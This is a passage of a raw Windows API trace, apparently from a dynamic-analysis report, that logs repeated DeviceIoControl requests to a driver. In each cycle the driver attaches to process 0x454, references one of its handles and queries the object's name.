lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.413] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.413] PsAcquireProcessExitSynchronization () returned 0x0 [0224.413] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.414] ObReferenceObjectByHandle (in: Handle=0x744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003922070, HandleInformation=0x0) returned 0x0 [0224.414] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.414] PsReleaseProcessExitSynchronization () returned 0x2 [0224.414] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.414] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.414] ObfDereferenceObject (Object=0xfffffa8003922070) returned 0x1 [0224.414] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.414] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.414] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0224.414] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.414] PsAcquireProcessExitSynchronization () returned 0x0 [0224.414] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.414] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0017c5b90, HandleInformation=0x0) returned 0x0 [0224.414] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.414] PsReleaseProcessExitSynchronization () returned 0x2 [0224.414] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.414] ObQueryNameString (in: Object=0xfffff8a0017c5b90, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.414] ObfDereferenceObject (Object=0xfffff8a0017c5b90) returned 0x1 [0224.414] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.414] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.414] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.414] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.414] PsAcquireProcessExitSynchronization () returned 0x0 [0224.414] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.415] ObReferenceObjectByHandle (in: Handle=0x768, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800fa9f360, HandleInformation=0x0) returned 0x0 [0224.415] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.415] PsReleaseProcessExitSynchronization () returned 0x2 [0224.415] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.415] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.415] ObfDereferenceObject (Object=0xfffffa800fa9f360) returned 0x1 [0224.415] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.415] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.415] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.415] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0224.415] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.415] PsAcquireProcessExitSynchronization () returned 0x0 [0224.415] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.415] ObReferenceObjectByHandle (in: Handle=0x770, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800298bc90, HandleInformation=0x0) returned 0x0 [0224.415] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.415] PsReleaseProcessExitSynchronization () returned 0x2 [0224.415] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.415] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.415] ObfDereferenceObject (Object=0xfffffa800298bc90) returned 0x1 [0224.415] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.415] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.415] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.415] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0224.416] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.416] PsAcquireProcessExitSynchronization () returned 0x0 [0224.416] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.416] ObReferenceObjectByHandle (in: Handle=0x778, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e7fdd0, HandleInformation=0x0) returned 0x0 [0224.416] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.416] PsReleaseProcessExitSynchronization () returned 0x2 [0224.416] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.416] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.416] ObfDereferenceObject (Object=0xfffffa8001e7fdd0) returned 0x1 [0224.416] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.416] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.416] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.416] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0224.416] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.416] PsAcquireProcessExitSynchronization () returned 0x0 [0224.416] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.416] ObReferenceObjectByHandle (in: Handle=0x780, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f3da80, HandleInformation=0x0) returned 0x0 [0224.416] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.416] PsReleaseProcessExitSynchronization () returned 0x2 [0224.416] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.416] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.416] ObfDereferenceObject (Object=0xfffffa8001f3da80) returned 0x1 [0224.417] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.417] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.417] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.417] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0224.417] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.417] PsAcquireProcessExitSynchronization () returned 0x0 [0224.417] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.417] ObReferenceObjectByHandle (in: Handle=0x7c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039a73c0, HandleInformation=0x0) returned 0x0 [0224.417] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.417] PsReleaseProcessExitSynchronization () returned 0x2 [0224.417] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.417] ObQueryNameString (in: Object=0xfffffa80039a73c0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.417] ObfDereferenceObject (Object=0xfffffa80039a73c0) returned 0x1 [0224.417] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.417] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.417] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.417] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0224.417] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.417] PsAcquireProcessExitSynchronization () returned 0x0 [0224.417] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.417] ObReferenceObjectByHandle (in: Handle=0x7cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003715dd0, HandleInformation=0x0) returned 0x0 [0224.418] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.418] PsReleaseProcessExitSynchronization () returned 0x2 [0224.418] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.418] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.418] ObfDereferenceObject (Object=0xfffffa8003715dd0) returned 0x1 [0224.418] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.418] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.418] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.418] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0224.418] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.418] PsAcquireProcessExitSynchronization () returned 0x0 [0224.418] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.418] ObReferenceObjectByHandle (in: Handle=0x7e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0224.418] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.418] PsReleaseProcessExitSynchronization () returned 0x2 [0224.418] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.418] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.419] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0224.419] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.419] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.419] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.419] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0224.419] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.419] PsAcquireProcessExitSynchronization () returned 0x0 [0224.419] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0224.419] ObReferenceObjectByHandle (in: Handle=0x7e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003694730, HandleInformation=0x0) returned 0x0 [0224.419] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.419] PsReleaseProcessExitSynchronization () returned 0x2 [0224.419] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0224.419] ObQueryNameString (in: Object=0xfffffa8003694730, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.225] ObfDereferenceObject (Object=0xfffffa8003694730) returned 0x2 [0225.225] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.225] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.226] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.226] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xd6, lpOverlapped=0x0) returned 1 [0225.226] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.226] PsAcquireProcessExitSynchronization () returned 0x0 [0225.226] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.226] ObReferenceObjectByHandle (in: Handle=0x7f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039e9f20, HandleInformation=0x0) returned 0x0 [0225.226] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.226] PsReleaseProcessExitSynchronization () returned 0x2 [0225.226] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.226] ObQueryNameString (in: Object=0xfffffa80039e9f20, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.226] ObfDereferenceObject (Object=0xfffffa80039e9f20) returned 0x2 [0225.226] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.226] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.226] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.226] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0225.226] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.226] PsAcquireProcessExitSynchronization () returned 0x0 [0225.226] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.226] ObReferenceObjectByHandle (in: Handle=0x854, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034eb920, HandleInformation=0x0) returned 0x0 [0225.226] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.227] PsReleaseProcessExitSynchronization () returned 0x2 [0225.227] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.227] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.227] ObfDereferenceObject (Object=0xfffffa80034eb920) returned 0x1 [0225.227] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.227] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.227] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.227] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.227] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.227] PsAcquireProcessExitSynchronization () returned 0x0 [0225.227] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.227] ObReferenceObjectByHandle (in: Handle=0x86c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80029511f0, HandleInformation=0x0) returned 0x0 [0225.227] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.227] PsReleaseProcessExitSynchronization () returned 0x2 [0225.227] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.227] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.227] ObfDereferenceObject (Object=0xfffffa80029511f0) returned 0x1 [0225.227] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.227] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.227] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.227] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0225.227] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.227] PsAcquireProcessExitSynchronization () returned 0x0 [0225.227] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.227] ObReferenceObjectByHandle (in: Handle=0x87c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003adb1f0, HandleInformation=0x0) returned 0x0 [0225.227] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.227] PsReleaseProcessExitSynchronization () returned 0x2 [0225.227] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.227] ObQueryNameString (in: Object=0xfffffa8003adb1f0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.228] ObfDereferenceObject (Object=0xfffffa8003adb1f0) returned 0x10 [0225.228] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.228] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.228] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.228] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0225.228] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.228] PsAcquireProcessExitSynchronization () returned 0x0 [0225.228] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.228] ObReferenceObjectByHandle (in: Handle=0x8d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001edc240, HandleInformation=0x0) returned 0x0 [0225.228] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.228] PsReleaseProcessExitSynchronization () returned 0x2 [0225.228] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.228] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.228] ObfDereferenceObject (Object=0xfffffa8001edc240) returned 0x1 [0225.228] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.228] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.228] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.228] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0225.228] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.228] PsAcquireProcessExitSynchronization () returned 0x0 [0225.228] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.228] ObReferenceObjectByHandle (in: Handle=0x910, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, 